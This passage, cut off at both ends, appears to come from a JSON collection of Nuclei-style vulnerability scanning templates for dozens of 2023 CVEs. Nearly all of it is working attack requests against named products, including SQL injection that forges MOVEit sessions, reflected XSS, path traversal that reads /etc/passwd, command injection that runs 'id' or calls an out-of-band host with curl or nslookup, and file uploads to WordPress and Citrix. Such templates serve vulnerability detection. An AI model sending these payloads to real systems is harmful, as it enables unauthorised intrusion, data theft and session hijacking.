application/json\n\n{\"id\":{{Task_id}},\"data\":{\"title\":\"Tasks\",\"ordering\":[],\"type\":\"list\",\"target\":\"tasks\",\"filters\":{\"conjunction\":\"or\",\"items\":[{\"filter\":\"filter:tasks:updated_by__active_organization__active_users__password\",\"operator\":\"regex\",\"value\":\"^pbkdf2_sha256\\\\$260000\\\\$\",\"type\":\"String\"}]},\"hiddenColumns\":{\"explore\":[],\"labeling\":[]},\"columnsWidth\":{},\"columnsDisplayType\":{},\"gridWidth\":4,\"search_text\":null},\"project\":\"{{Project_id}}\"}\n","GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_4, \"completed_at\", \"file_upload\", \"annotators\")","status_code_3==200 && status_code_4==200","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","name":"csrf","group":1,"regex":["me=\"csrfmiddlewaretoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-30150","info":{"name":"PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains(tolower(response_1), \"prestashop\")"],"condition":"and"}]}]},{"id":"CVE-2023-1454","info":{"name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQLException","XPATH syntax error:"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["XPATH syntax error: '([a-z_@%]+)'","XPATH syntax error: '([a-z- @%]+)'","XPATH syntax error: '([a-z@%0-9.]+)'"],"part":"body"}]}]},{"id":"CVE-2023-29623","info":{"name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","incorrect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1892","info":{"name":"Sidekiq < 7.0.8 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/queues"],"matchers":[{"type":"word","internal":true,"part":"body","words":["Sidekiq","Dashboard"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E","{{BaseURL}}/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E","{{BaseURL}}/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2949","info":{"name":"OpenEMR < 7.0.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/interface/forms/eye_mag/js/eye_base.php?providerID=%3Cimg%20src=x%20onerror=alert(document.domain);%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"\", \"openemr\")"],"condition":"and"}]}]},{"id":"CVE-2023-25717","info":{"name":"Ruckus Wireless Admin - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), 'user-agent','curl')","status_code_1 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-2272","info":{"name":"Tiempo.com <= 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"\")","contains(body_2, \"Tiempo\")"],"condition":"and"}]}]},{"id":"CVE-2023-3765","info":{"name":"MLflow Absolute Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"is_dir\":","\"path\":","\"files\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35162","info":{"name":"XWiki < 14.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)"],"matchers":[{"type":"dsl","dsl":["contains(body, \"name=\\\"xcontinue\\\" value=\\\"javascript:alert(document.domain)\")","contains(body, \"previewactions.vm\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-45852","info":{"name":"Viessmann Vitogate 300 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-4-8\",\"session\":\"\",\"params\":{\"ipaddr\":\"{{randstr}};cat /etc/passwd\"}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(header, \"application/json\")","contains_all(body, \"traceroute: {{randstr}}: Unknown host\", \"daemon:x:1:1:\")"],"condition":"and"}]}]},{"id":"CVE-2023-52085","info":{"name":"Winter CMS Local File Inclusion - (LFI)","severity":"medium"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_token={{_token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/system/mailbrandsettings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-WINTER-REQUEST-HANDLER: onSave\nX-WINTER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_token={{_token}}&MailBrandSetting%5Bbody_bg%5D=%2342445B;@import%20(inline)%20%22/etc/passwd%22&redirect=0\n","GET /backend/system/mailbrandsettings HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"regex","part":"body_4","regex":["root:[x*]:0:0:"]}],"extractors":[{"type":"regex","part":"body","name":"_token","group":1,"regex":["\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-39598","info":{"name":"IceWarp Email Client - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}\">"],"matchers-condition":"and","matchers":[{"type":"word","words":["","icewarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0968","info":{"name":"WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/onmouseover=alert(document.domain)//\")","contains(body_2, \"Watu Quizzes\")"],"condition":"and"}]}]},{"id":"CVE-2023-5089","info":{"name":"Defender Security < 4.1.0 - Protection Bypass (Hidden Login Page)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?gf_page=randomstring"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["%2F%3Fgf_page%3Drandomstring&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2023-44353","info":{"name":"Adobe ColdFusion WDDX Deserialization Gadgets","severity":"critical"},"requests":[{"raw":["POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=
    {{windows_known_path}}\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=
    {{windows_bad_path}}\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=
    {{linux_known_path}}\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=
    {{linux_bad_path}}\n"],"matchers-condition":"or","matchers":[{"type":"dsl","name":"windows","dsl":["status_code_1 == 500 && status_code_2 == 404","contains(body_1, \"coldfusion.runtime\")"],"condition":"and"},{"type":"dsl","name":"linux","dsl":["status_code_3 == 500 && status_code_4 == 404","contains(body_3, \"coldfusion.runtime\")"],"condition":"and"}]}]},{"id":"CVE-2023-41621","info":{"name":"Emlog Pro v2.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin/store.php?\"onmouseover='alert(document.domain)'bad=\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["onmouseover='alert(document.domain)'bad=","emlog"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36934","info":{"name":"MOVEit Transfer - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntransaction=signon\n","POST /human.aspx?ep={{url_encode(ep)}} HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: InitialPage=zzzz.aspx;\n\ntransaction=passchangerequest\n","POST /machine.aspx HTTP/2\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};\n\na=a\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{session_cookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["\"refresh_token\"","\"access_token\"","\"token_type\"","\"expires_in\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ep","group":1,"regex":["\\bep=([^&]+)\""],"internal":true,"part":"body_1"},{"type":"regex","name":"session","group":1,"regex":["ASP.NET_SessionId=([^;]+)"],"internal":true,"part":"header_2"},{"type":"regex","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body_4"}]}]},{"id":"CVE-2023-37266","info":{"name":"CasaOS < 0.4.4 - Authentication Bypass via Random JWT Token","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"Authorization":"{{jwt_token}}"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-2479","info":{"name":"Appium Desktop Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-1890","info":{"name":"Tablesome < 1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"\")","contains(body_2, \"tablesome\")"],"condition":"and"}]}]},{"id":"CVE-2023-39143","info":{"name":"PaperCut < 22.1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"],"matchers":[{"type":"dsl","dsl":["content_length == 1655","status_code == 200","contains(to_lower(content_type), \"image/png\")","contains(hex_encode(body), \"89504e470d0a1a0a\")"],"condition":"and"}]}]},{"id":"CVE-2023-39120","info":{"name":"Nodogsplash - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["nodogsplash","password"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6831","info":{"name":"mlflow - Path Traversal","severity":"high"},"requests":[{"raw":["PUT /api/2.0/mlflow-artifacts/artifacts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{randstr}}\n","DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["Content-Type: application/json","Server: gunicorn"],"condition":"and"},{"type":"word","part":"body_2","words":["{}"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-35160","info":{"name":"XWiki >= 2.5-milestone-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)","{{BaseURL}}/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"javascript:alert(document.domain)\"","XWikiGuest"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-50917","info":{"name":"MajorDoMo thumb.php - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)","rtsp_transport"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43662","info":{"name":"ShokoServer System - Local File Inclusion (LFI)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/Image/withpath/C:\\Windows\\win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47643","info":{"name":"SuiteCRM Unauthenticated Graphql Introspection","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-XSRF-TOKEN: {{csrftoken}}\n\n{\"query\":\"query IntrospectionQuery {\\r\\n __schema {\\r\\n \\r\\n queryType { name }\\r\\n mutationType { name }\\r\\n subscriptionType { name }\\r\\n types {\\r\\n ...FullType\\r\\n }\\r\\n directives {\\r\\n name\\r\\n description\\r\\n \\r\\n locations\\r\\n args {\\r\\n ...InputValue\\r\\n }\\r\\n }\\r\\n }\\r\\n }\\r\\n\\r\\n fragment FullType on __Type {\\r\\n kind\\r\\n name\\r\\n description\\r\\n \\r\\n fields(includeDeprecated: true) {\\r\\n name\\r\\n description\\r\\n args {\\r\\n ...InputValue\\r\\n }\\r\\n type {\\r\\n ...TypeRef\\r\\n }\\r\\n isDeprecated\\r\\n deprecationReason\\r\\n }\\r\\n inputFields {\\r\\n ...InputValue\\r\\n }\\r\\n interfaces {\\r\\n ...TypeRef\\r\\n }\\r\\n enumValues(includeDeprecated: true) {\\r\\n name\\r\\n description\\r\\n isDeprecated\\r\\n deprecationReason\\r\\n }\\r\\n possibleTypes {\\r\\n ...TypeRef\\r\\n }\\r\\n }\\r\\n\\r\\n fragment InputValue on __InputValue {\\r\\n name\\r\\n description\\r\\n type { ...TypeRef }\\r\\n defaultValue\\r\\n \\r\\n \\r\\n }\\r\\n\\r\\n fragment TypeRef on __Type {\\r\\n kind\\r\\n name\\r\\n ofType {\\r\\n kind\\r\\n name\\r\\n ofType {\\r\\n kind\\r\\n name\\r\\n ofType {\\r\\n kind\\r\\n name\\r\\n ofType {\\r\\n kind\\r\\n name\\r\\n ofType {\\r\\n kind\\r\\n name\\r\\n ofType {\\r\\n kind\\r\\n name\\r\\n ofType {\\r\\n kind\\r\\n name\\r\\n }\\r\\n }\\r\\n }\\r\\n }\\r\\n }\\r\\n }\\r\\n }\\r\\n }\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["userHash","authenticateId","systemGeneratedPassword"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"part":"header","regex":["XSRF-TOKEN=([^;]+)"],"internal":true}]}]},{"id":"CVE-2023-4596","info":{"name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe\n\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"textarea-1\"\n\n{{randstr}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"phone-1\"\n\n{{rand_int(10)}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"email-1\"\n\ntest@gmail.com\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"name-1\"\n\n{{randstr}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"postdata-1-post-image\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"forminator_nonce\"\n\n{{forminator_nonce}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"current_url\"\n\n{{BaseURL}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"action\"\n\nforminator_submit_form_custom-forms\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Upload file","forminator-field-upload"],"condition":"and"},{"type":"word","part":"body_2","words":["{\"success\":true","\"form_id\":\"{{form_id}}\"","\"behav"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"forminator_nonce","part":"body","group":1,"regex":["name=\"forminator_nonce\" value=\"([a-z0-9]+)\" \\/>"],"internal":true},{"type":"regex","name":"form_id","part":"body","group":1,"regex":["name=\"form_id\" value=\"([0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-4634","info":{"name":"Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt","{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Media Library Assistant"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-22478","info":{"name":"KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access","severity":"high"},"requests":[{"raw":["@timeout 10\nPOST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"apiVersion\":","\"uuid\":","\"userName\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28343","info":{"name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /index.php/management/set_timezone HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip, deflate\nReferer: {{RootURL}}/index.php/management/datetime\n\ntimezone=`nslookup {{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Time Zone updated successfully"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47218","info":{"name":"QNAP QTS and QuTS Hero - OS Command Injection","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=\"avssqwfz\"\n\n--avssqwfz\nContent-Disposition: form-data; xxpcscma=\"field2\"; zczqildp=\"{{cmd}}\"\nContent-Type: text/plain\n\nskfqduny\n--avssqwfz\u2013\n","POST /cgi-bin/quick/{{file}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_1, \"code\\\": 200\", \"full_path_filename success\")","contains_all(body_2, \"uid=\", \"gid=\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3846","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \">\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-40208","info":{"name":"Stock Ticker <= 3.23.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stockticker_load&symbols=MSFT&class=%22+onmousemove%3Dalert%28document.domain%29+\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["stock_ticker","onmousemove=alert(document.domain)"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46347","info":{"name":"PrestaShop Step by Step products Pack - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /modules/ndk_steppingpack/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type, \"text/html\")","contains(header, \"PrestaShop\")"],"condition":"and"}]}]},{"id":"CVE-2023-4973","info":{"name":"Academy LMS 6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/academy/tutor/filter?searched_word=acoa5\"><script>alert(document.domain)</script>dyzs0&searched_tution_class_type%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0&price_min=1&price_max=9&searched_price_type%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0&searched_duration%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"\", \"List of tuitions\")"],"condition":"and"}]}]},{"id":"CVE-2023-37474","info":{"name":"Copyparty <= 1.8.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.cpr/%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4568","info":{"name":"PaperCut NG Unauthenticated XMLRPC Functionality","severity":"medium"},"requests":[{"raw":["POST /rpc/clients/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nContent-Type:text/xml\n\nclient.getGlobalConfigstr1str2\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["conf.ssl-port","conf.auth-ttl-default"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6444","info":{"name":"Seriously Simple Podcasting < 3.0.0 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/seriously-simple-podcasting\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /?feed=itunes HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"\",\"\")","contains(content_type,\"text/xml\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-24489","info":{"name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\\..\\..\\..\\cifs&filename={{fileName}}.aspx HTTP/1.1\nHost: {{Hostname}}\n\n<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n\n"],"payloads":{"padding":"helpers/payloads/citrix_paddings.txt"},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["body == \"ERROR: The method or operation is not implemented.\"","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["BaseURL+ \"/cifs/\" + fileName + 